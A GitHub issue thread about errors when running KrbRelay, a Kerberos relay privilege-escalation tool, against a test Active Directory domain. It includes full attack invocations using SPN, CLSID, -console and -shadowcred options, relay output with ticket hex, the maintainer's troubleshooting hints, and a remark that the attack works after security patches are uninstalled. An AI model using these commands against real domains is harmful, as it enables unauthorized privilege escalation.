Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

LDAP error bind 49 #1

Closed
darkr4y opened this issue Feb 15, 2022 · 7 comments
Closed

LDAP error bind 49 #1

darkr4y opened this issue Feb 15, 2022 · 7 comments

Comments

@darkr4y
Copy link

darkr4y commented Feb 15, 2022
edited
Loading

DC: WIN-1TCHOPTDEJ5 (Win2016 version [10.0.14393])
Computer in AD: PC-01 (Win10 version [10.0.17763.316])

Reproduce Steps:

  1. a Domain User test1 logged on PC-01
  2. if I dont add any attack args like KrbRelay.exe -spn ldap/WIN-1TCHOPTDEJ5 -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8, it will return following result and LDAP connection established.
[*] Relaying context: \PC-01$
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\test1\Desktop\kerberosRelay\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAA45MGb9Q/YaElYFYWcVCgXAkwAADgS//9/pJM3dDPQUCIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing SYSTEM authentication
[*] Using CLSID: 90f18417-f0f1-484e-9d3c-59dceee5dbd8
[*] apReq: 6082065106092a864886f71201020201006e8206403082063ca003020105a10302010ea20703050020000000a382047c6182047830820474a003020105a10e1b0c54454d5041442e4c4f43414ca2223020a003020102a11930171b046c6461701b0f57494e2d315443484f505444454a35a382043730820433a003020112a103020103a28204250482042182f8cba4a66941935594695408ee242029901f1a11fd75176abfad88d9167bcafd50f2c1a22ecb1d85aab4c8cca92309c91e3c7a46cad43ee0d8bd7326a5a23e8bb73eda3920367cb2c60707ead568eb4d3f26ef5efe889c5da30df9dd7e17bb3fc0f6210044e921c8fd4e507346a17843b137c0e2aca07d79c82dac7e9293350207c9a0e54c43cca56e244ce134fe2894cc1e3374551dd828b8a448b4f3fd878d2ddbbce1017b7ee6a1604b2fead393cefbae4833cd8971096080adde3eba249461fce0e678d600dfd8c7f16735b6d78fb654150e443e4b982066a1bbf87237edd94756fb1127065f794affc96cbff1253138468131340b86afb6814e084fdbf38521d6293acbf89f43c34cfcaeed4e6eea9887f51bd369ea38a6db0365c362f673ec7392775f999a22d55a1449a09bb94ad49175d09b6e23b809176b7118df7b815a1631982f8805da62bee193fa550fdbf80f8740f2880c6abe66933a6e665701592a24484a84037a004127b3abf58d67d700e363eddf3dc7dbee6242c97076ae3900675db525ef16532cfd68f33fcfba467d6bef1bcc13692b795cd0a20bb40d6c753985fafe247fbd4b9792ab1d77f5b13be441a83f4800556c94f231a191c853e834d5de247593b1c68df684283b837c14edec054a2cb92c38bd8a0d485d8cfd171e66c23b2a34c9cc64b21b4cd8edefa5c654e983e6a009c4ba669888410c5b356f43dc11c67c5a141f4ae73412e76d35b4ee3dd3f489652bb5d1c3b308d1069ab34acede182fe80ee50fabf91a903c7c7d7bf9b41d5eef9a763f466c6a825f1efa7f4429d227daf29990a488d89042186f84002d0b8deb2dfebe688813845842ba4c6290d47aa9e2838778e24d90c69175f35c2eebf900e2e41397b3ee382da01548c3aecbc2d846d5472aef674d12da329370302932c446a64603a96a151d0c19197143ddc74b53057360ce0cd0dbb8be003efdd25f72f68d529790a26954771fe0d4c7be0b601a078442816834070a925b50a5515fd468f3e73f3db7934c2ae31a0a12ba0fe5f81f9acf4c6971d18e09a1c75115c33d797398c4ca3d8c1d960aa5d7c417cb8f95940d4ec90baf818b2d273198c92069c3e0d01eb3818d97f1f9422eb226a4aee190a094351bc84491efd0c80ac99703a5796d4283360c476e7690a84ea2389ca7900d693bc090505611e29e16cae6f44fa320a1d76d3092636cebf5c3d0fbade5479a169bcdd897cbaad86e7d7f45b8f57acee22006f8a0f01bee5c694fe410c6dd8de82a07613b47ffe3a31bc2d75f61a04bd1b43e2dfeb416c415d689f0ac8fc01d0bf021ce3baf4d09c391f2aaf5dceec8866f8c8f0e952599d4ecc2be505f5bb1b0ba7890676be257eec7e98625aaa94ba66cab59e082a043a704e47388a76ea64b7c6c6cdf7727d3426a0f7889c918832ec13262d2a0b0493cc9b0b3c94db7359cd559a2517e0bd97d606814100c1209364695a48201a5308201a1a003020112a2820198048201943e8cb71f63c77cb686fa20725cb3ba7833ef9420d5592d166f46469a7e3f3883d8eef20f56c13f3a5a704a5c632ec7b6c56f9b6a403d725ba0fbcd752ed56e0e1a70ebd5d205e53e05dab69fc9dfcfef70c47d872215d033edf898ef9a8331d10b3edef37f1546b61187c12f4dccaadd89c85fa338abfcceacc85695feee28f6936cd53519fd6d6462ed3dc9c311f53d2aa00011749e512e2474b332a2f0254ec3ec0143432ab2a10cb3c74dd55d3af3015371c5eb898b3068b76812887f29c9f341e4d93255af42cc37b093555d4013327e6efd5ce36abf6ea1c56f69350ff98305dd8c006b39a6ebd9e31bf97bf8ef7d30e862041ee1f8d64b6bed93f86d98de863d362d0ebee1a40672d31908ae1aac0ce908b3fcf139ffcdbf98f1bb2fbe71a77bfd09efebde96f9e5bccf3f55725a888434c251a608bbfa721db5da86e30a78a81692dec1d273914c88824a080705dcbe0b2de6e19b32282da721888fd431c99f72e83ef91ad63a8eb142b5120dd0ab9871321ff1ceffb5f9babd59b0a6617019045574d4cbc1b4cd1eb74cde81e86370fb
[*] bind: 0
[*] ldap_get_option: LDAP_SASL_BIND_IN_PROGRESS
[*] apRep1: 6f8187308184a003020105a10302010fa2783076a003020112a26f046d3427170628dc24cda41583fa8d10b65257d34186272388da6e351ae3d15f789ad0c3f395971f810a68ce47377c14370a37cf3c4ba866b516233f9c90929a59296b1f4c4775bd2b7d07cd5f55d310f01ee096da0b0d773137f4b28d452946d442a557c928eacd9d5fb374bec720
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, UseDceStyle, Connection
[*] apRep2: 6f5b3059a003020105a10302010fa24d304ba003020112a24404426a6f83f6c4dfad71a59b06b061aa24e2500665954f53bc2c93912062c36303158612466cb4e98aa707a303a5ac1058385d6c65a349054eda2a05d96a1b3083c5a059
[*] bind: 0
[*] ldap_get_option: LDAP_SUCCESS
[+] LDAP session established
  1. if I add any attack args like KrbRelay.exe -spn ldap/WIN-1TCHOPTDEJ5 -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -console to show a LDAP interactive prompt, it will return following result , any other attack argument will always return the bind error 49:
[*] Relaying context: \PC-01$
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\test1\Desktop\kerberosRelay\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAACzUo56WtQ8KGUjhSm/iGlmAngAACQH//9u3mDSDugeTiIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing SYSTEM authentication
[*] Using CLSID: 90f18417-f0f1-484e-9d3c-59dceee5dbd8
[*] apReq: 05000b0710000000db00330002000000d016d0160000000003000000000001004301000000000000c00000000000004600000000045d888aeb1cc9119fe808002b10486002000000010001004301000000000000c0000000000000460000000033057171babe37498319b5dbef9ccc3601000000020001004301000000000000c000000000000046000000002c1cb76c129840450300000000000000010000000a050000000000004e544c4d535350000100000097b208e2060006002d00000005000500280000000a0063450000000f50432d303154454d504144
[*] bind: 49
[*] ldap_get_option: LDAP_INVALID_CREDENTIALS
[-] Ldap failed

Is there anything I missed?
@cube0x0
Copy link
Owner

cube0x0 commented Feb 15, 2022

hi!
use FQDN in the spn parameter and try the latest version i just pushed

@darkr4y
Copy link
Author

darkr4y commented Feb 15, 2022

I have tried the latest version and the spn param with FQDN, the whole command like KrbRelay.exe -spn ldap/WIN-1TCHOPTDEJ5.tempad.local -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -console
and the same error returned:

[*] Relaying context: tempad.local\PC-01$
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] CoInitializeSecurity hResult 0x80010119
[*] GetModuleFileName: C:\Users\test1\Desktop\kerberosRelay\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAACyVuRV/xS6Pa9PMFEoKzG1AoAAAJAU//8q63PhyIL6VyIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing SYSTEM authentication
[*] Using CLSID: 90f18417-f0f1-484e-9d3c-59dceee5dbd8
[*] apReq: 05000b0710000000db00330002000000d016d0160000000003000000000001004301000000000000c00000000000004600000000045d888aeb1cc9119fe808002b10486002000000010001004301000000000000c0000000000000460000000033057171babe37498319b5dbef9ccc3601000000020001004301000000000000c000000000000046000000002c1cb76c129840450300000000000000010000000a050000000000004e544c4d535350000100000097b208e2060006002d00000005000500280000000a0063450000000f50432d303154454d504144
[*] bind: 49
[*] ldap_get_option: LDAP_INVALID_CREDENTIALS
[-] Ldap failed

I just review james forshaw's article found that maybe the problem is about CoInitializeSecurity
I modified the code in Program.cs line 865 to print the return value

Console.WriteLine("[*] Init com server");
var hResult = CoInitializeSecurity(IntPtr.Zero, svcs.Length, svcs,
IntPtr.Zero, AuthnLevel.RPC_C_AUTHN_LEVEL_DEFAULT,
ImpLevel.RPC_C_IMP_LEVEL_IMPERSONATE, IntPtr.Zero,
Natives.EOLE_AUTHENTICATION_CAPABILITIES.EOAC_DYNAMIC_CLOAKING,
IntPtr.Zero);
string hResultStr = "0x" + hResult.ToString("X");
Console.WriteLine("[*] CoInitializeSecurity hResult {0}", hResultStr);

@cube0x0
Copy link
Owner

cube0x0 commented Feb 15, 2022

a valid apReq starts with "60", you cannot expect it to work with an invalid apReq :p
check your environment and parameters

@cube0x0 cube0x0 closed this as completed Feb 15, 2022
@mgp25 mgp25 mentioned this issue May 26, 2022
Closed
@NickYan7
Copy link

NickYan7 commented Jun 7, 2022

a valid apReq starts with "60", you cannot expect it to work with an invalid apReq :p check your environment and parameters

I got same error however my apReq starts with 60 which is valid packet as you said...
Besides, I also got error [*] ldap_modify: LDAP_NO_SUCH_OBJECT , I had tried FQDN, hostname with $ & hostname only, none of them worked, please check this, thanks a lot!!

Tested on Win10 1909 & Win10 20H2, the DC is Server 16.

@NickYan7
Copy link

NickYan7 commented Jun 7, 2022
edited
Loading

when I use FQDN, it printed like this:
[*] System.ArgumentNullException: value cannot be null

The command is krbrelay.exe -spn ldap/dc.local.com -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -shadowcred pc$.local.com -port 10.

And I'm sure the apReq starts with 60.

Screenshot 2022-06-07 下午10 59 59

@cube0x0

@NickYan7 NickYan7 mentioned this issue Jul 12, 2022
Open
@ecote7
Copy link

ecote7 commented Nov 28, 2022

when I use FQDN, it printed like this: [*] System.ArgumentNullException: value cannot be null

The command is krbrelay.exe -spn ldap/dc.local.com -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -shadowcred pc$.local.com -port 10.

And I'm sure the apReq starts with 60.

Screenshot 2022-06-07 下午10 59 59

@cube0x0

Same issue here. Anyone found a solution ?

@ecote7
Copy link

ecote7 commented Nov 28, 2022

It looks like it has been patched. https://blog.0patch.com/2022/08/micropatching-krbrelay-local-privilege.html
It works when I uninstall the MS Security patches installed (in November in my case).

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@darkr4y @ecote7 @NickYan7 @cube0x0